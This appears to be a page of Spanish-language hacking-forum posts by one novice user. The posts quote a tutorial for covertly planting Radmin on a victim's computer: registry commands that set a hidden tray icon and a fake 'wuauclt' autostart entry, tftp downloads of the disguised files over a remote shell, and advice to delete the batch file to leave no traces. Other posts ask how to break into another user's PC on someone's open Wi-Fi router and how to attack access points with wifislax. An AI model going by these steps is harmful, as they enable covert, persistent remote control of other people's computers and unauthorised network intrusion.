Mensajes

Sinceramente, he comentado en tu otro post Octalh... y perdon por mi ignorancia pero sigo en las mismas... :S

en el otro post comenté sobre el tftp .... y en este pues una nueva duda que me surgió... en el radmin viewer... que address colocamos? ... la del tftp? si es así.. que tftp? :S

Gracias de antemano :S

Después de bastantes años, decidí hacerlo haber que tal ya que soy un completo n00b en esto... así que si pregunto cosas coherentes... LO SIENTO

Y mi duda es la siguiente:

Todo lo que copio a continuación entra dentro del .bat?

6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.

codigo:

Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

solo sustituyan los valores por los suyos.

7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado

Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre

Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)

Por otro lado, cuando pone tftp -i xxx.xxx.xxx.xxx que se supone que debo poner en dichas xxx? Ojalá pudieran ayudarme después de tantos años... muchisimas gracias de antemano!!

está claro que tardaré un tiempo en decirle nada... es el tercer verano que me conecto gratis ejjeje.. pero.. nosé este año quiero avanzar más y hacer algo.. acceder a su pc o cosa así.. consigo hasta acceder al home del router y su configuración... he visto el bssid de otro pc conectado.. pero.. que hago?, soy algo novato.. lo sé...

Estoy en un router metido con mi portatil y me gustaria saber que puedo hacer con esta ventaja...

Este router está sin ningún tipo de cifrado e incluso estoy en su home y puedo configurarlo a mi manera, se que podría entrar en los otros pc's conectados a esta red, pero nosé como..

En el home del router he visto 2 bssid, uno es el de mi portatil y otro supongo que será el de otra persona conectado a la red... que puedo hacer?

Pues lo dicho... estoy bajo un mismo router en un piso en la playa... Este router no tiene ningun tipo de seguridad.. me conecto y me desconecto a él en cuanto quiera... el caso es que... que se os ocurriría a ustedes para poder hacer?.. es decir... entrar al otro pc, ems.. controlar datos de entrada y salida.. nosé...

Quiero enseñarles que un router wifi sin clave, puede ser algo malo...

OJO, no quiero hacer ningún tipo de trastada... solo aprender algo nuevo o enviarles un mensaje a su pc o algo diciendo que encripten el wifi...

Gracias! 

en el código fuente lo unico qe pone esto...:

<!--doctype-PublicHTML ->
<html>
<head>
<title>Hola</title>
</head>
<script href="e.php?cookie=2" src="e.php?cookie=1">
var f=prompt('Pon el pass','');
if(f!="SeRcA"){
alert("Error");
self.location.reload();
}else{
self.location.href="e.php?pas="+f;
}
<!--Feliciades, asi de facil-->
</script></body></html>



=S

pero tengo entendido que si la pirateas, pierdes la conexión a internet.. no?

lo mejor es que te descargues hamachi y lo instales. Hamachi es un programa que se instala y crea una ip pública virtual en tu ordenador (tienes que tenerlo instalado en todas las pc's clientes y servers) en él creas una red con un nombre y una contraseña, y simulas una red local con los ordenadores conectados en esa red...

cuando configures el radmin server pon el nombre de usuario, contraseña, privilegios... y en el viewer pones la ip de hamachi que tiene asignada el pc que vas a controlar... una vez conecte, pones usuario, contraseña y listo..

A MONITORIZAR!

BSSID            STATION 
(no associed)     (aki todo correcto)

ami me pasa lo mismo pero usando wifislax, la verdad esque nosé por qué, aún así, con el airodump digo el canal que quiero y sí sale la BSSID la ESSID el channel y lo demás... lo que no consigo es asociarme a un router cuando es fake.. alguien tiene idea?

Antes de nada, lo siento si hay otro post relacionado con mi pregunta... pero estoy hartito de buscar y solo encuentro desencrptar wep y wap... pero en ningún lado dice como hacerlo cuando se te dice que es fake.. Uso el netslumber para averiguar el canal al que llega a mi tarjeta de red, apunto su mac y su essid.. pero hay una pestañita que me indica FAKE...

Luego utilizo linux/wifislax y tal, y cuando voy asociarme con el router, la verdad es que no consigue asociar, me da error, ataque fallido, y unas posibles causas por el que no consigue asociar, aunque se que es por que me pone FAKE, pues sólo me aparece cuando esto se me indica.

He leído algo sobre cuando hay y no hay clientes, y la verdad, tampoco lo entiendo mucho, pero es lo más parecido que he encontrado a mi problema...

Muchas gracias de antemano, y feliz navidad.